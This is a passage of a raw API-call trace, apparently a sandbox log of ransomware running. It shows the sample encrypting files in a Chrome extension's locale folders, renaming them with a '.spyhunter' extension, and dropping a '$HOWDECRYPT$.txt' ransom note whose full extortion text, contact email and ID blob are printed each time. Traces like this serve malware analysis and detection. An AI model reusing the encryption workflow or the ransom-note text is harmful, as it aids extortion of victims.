[0160.219] GetProcessHeap () returned 0x2c0000 [0160.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f18470 | out: hHeap=0x2c0000) returned 1 [0160.219] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eaa8 | out: pbBuffer=0x57eaa8) returned 1 [0160.219] GetProcessHeap () returned 0x2c0000 [0160.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.219] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eaa0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eaa0*=0x30) returned 1 [0160.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0160.220] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json") returned 155 [0160.221] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.221] GetProcessHeap () returned 0x2c0000 [0160.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0160.221] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ea64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ea64*=0xc4, lpOverlapped=0x0) returned 1 [0160.222] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffff3c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.222] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xc4, lpNumberOfBytesWritten=0x57ea64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ea64*=0xc4, lpOverlapped=0x0) returned 1 [0160.222] GetProcessHeap () returned 0x2c0000 [0160.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0160.222] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.222] WriteFile (in: hFile=0xb0, lpBuffer=0x57eaa4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ea64, lpOverlapped=0x0 | out: lpBuffer=0x57eaa4*, lpNumberOfBytesWritten=0x57ea64*=0x4, lpOverlapped=0x0) returned 1 [0160.222] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ea64, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ea64*=0x30, lpOverlapped=0x0) returned 1 [0160.222] CloseHandle (hObject=0xb0) returned 1 [0160.222] GetProcessHeap () returned 0x2c0000 [0160.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0160.222] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.spyhunter") returned 165 [0160.223] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.spyhunter")) returned 1 [0160.224] GetProcessHeap () returned 0x2c0000 [0160.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0160.224] GetProcessHeap () returned 0x2c0000 [0160.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.224] GetProcessHeap () returned 0x2c0000 [0160.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f182e8 | out: hHeap=0x2c0000) returned 1 [0160.224] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0160.225] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.225] WriteFile (in: hFile=0xb0, lpBuffer=0x57e9d7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eb00, lpOverlapped=0x0 | out: lpBuffer=0x57e9d7*, lpNumberOfBytesWritten=0x57eb00*=0x127, lpOverlapped=0x0) returned 1 [0160.226] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.226] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eb00, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eb00*=0x2ac, lpOverlapped=0x0) returned 1 [0160.226] CloseHandle (hObject=0xb0) returned 1 [0160.226] GetProcessHeap () returned 0x2c0000 [0160.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f18160 | out: hHeap=0x2c0000) returned 1 [0160.226] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eaa0 | out: pbBuffer=0x57eaa0) returned 1 [0160.226] GetProcessHeap () returned 0x2c0000 [0160.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.227] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ea98*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ea98*=0x30) returned 1 [0160.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0160.227] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json") returned 155 [0160.228] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.228] GetProcessHeap () returned 0x2c0000 [0160.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0160.228] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ea5c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ea5c*=0xb3, lpOverlapped=0x0) returned 1 [0160.229] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.229] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x57ea5c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ea5c*=0xb3, lpOverlapped=0x0) returned 1 [0160.229] GetProcessHeap () returned 0x2c0000 [0160.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0160.229] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.229] WriteFile (in: hFile=0xb0, lpBuffer=0x57ea9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ea5c, lpOverlapped=0x0 | out: lpBuffer=0x57ea9c*, lpNumberOfBytesWritten=0x57ea5c*=0x4, lpOverlapped=0x0) returned 1 [0160.229] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ea5c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ea5c*=0x30, lpOverlapped=0x0) returned 1 [0160.229] CloseHandle (hObject=0xb0) returned 1 [0160.229] GetProcessHeap () returned 0x2c0000 [0160.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0160.229] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.spyhunter") returned 165 [0160.230] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.spyhunter")) returned 1 [0160.231] GetProcessHeap () returned 0x2c0000 [0160.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0160.231] GetProcessHeap () returned 0x2c0000 [0160.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.231] GetProcessHeap () returned 0x2c0000 [0160.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f17fd8 | out: hHeap=0x2c0000) returned 1 [0160.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0160.232] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.232] WriteFile (in: hFile=0xb0, lpBuffer=0x57e9cf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eaf8, lpOverlapped=0x0 | out: lpBuffer=0x57e9cf*, lpNumberOfBytesWritten=0x57eaf8*=0x127, lpOverlapped=0x0) returned 1 [0160.233] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.233] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eaf8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eaf8*=0x2ac, lpOverlapped=0x0) returned 1 [0160.233] CloseHandle (hObject=0xb0) returned 1 [0160.233] GetProcessHeap () returned 0x2c0000 [0160.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f17e50 | out: hHeap=0x2c0000) returned 1 [0160.233] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea98 | out: pbBuffer=0x57ea98) returned 1 [0160.233] GetProcessHeap () returned 0x2c0000 [0160.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.233] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ea90*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ea90*=0x30) returned 1 [0160.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0160.234] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json") returned 155 [0160.234] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.234] GetProcessHeap () returned 0x2c0000 [0160.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0160.234] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ea54, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ea54*=0x104, lpOverlapped=0x0) returned 1 [0160.235] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.235] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x57ea54, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ea54*=0x104, lpOverlapped=0x0) returned 1 [0160.235] GetProcessHeap () returned 0x2c0000 [0160.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0160.236] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.236] WriteFile (in: hFile=0xb0, lpBuffer=0x57ea94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ea54, lpOverlapped=0x0 | out: lpBuffer=0x57ea94*, lpNumberOfBytesWritten=0x57ea54*=0x4, lpOverlapped=0x0) returned 1 [0160.236] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ea54, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ea54*=0x30, lpOverlapped=0x0) returned 1 [0160.236] CloseHandle (hObject=0xb0) returned 1 [0160.236] GetProcessHeap () returned 0x2c0000 [0160.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0160.236] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.spyhunter") returned 165 [0160.236] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.spyhunter")) returned 1 [0160.237] GetProcessHeap () returned 0x2c0000 [0160.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0160.238] GetProcessHeap () returned 0x2c0000 [0160.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.238] GetProcessHeap () returned 0x2c0000 [0160.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f17cc8 | out: hHeap=0x2c0000) returned 1 [0160.238] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0160.239] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.239] WriteFile (in: hFile=0xb0, lpBuffer=0x57e9c7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eaf0, lpOverlapped=0x0 | out: lpBuffer=0x57e9c7*, lpNumberOfBytesWritten=0x57eaf0*=0x127, lpOverlapped=0x0) returned 1 [0160.240] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.240] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eaf0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eaf0*=0x2ac, lpOverlapped=0x0) returned 1 [0160.240] CloseHandle (hObject=0xb0) returned 1 [0160.240] GetProcessHeap () returned 0x2c0000 [0160.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6ead0 | out: hHeap=0x2c0000) returned 1 [0160.240] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea90 | out: pbBuffer=0x57ea90) returned 1 [0160.240] GetProcessHeap () returned 0x2c0000 [0160.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.240] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ea88*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ea88*=0x30) returned 1 [0160.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0160.241] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json") returned 155 [0160.241] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.241] GetProcessHeap () returned 0x2c0000 [0160.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0160.241] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ea4c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ea4c*=0xbe, lpOverlapped=0x0) returned 1 [0160.242] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffff42, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.242] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xbe, lpNumberOfBytesWritten=0x57ea4c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ea4c*=0xbe, lpOverlapped=0x0) returned 1 [0160.243] GetProcessHeap () returned 0x2c0000 [0160.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0160.243] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, 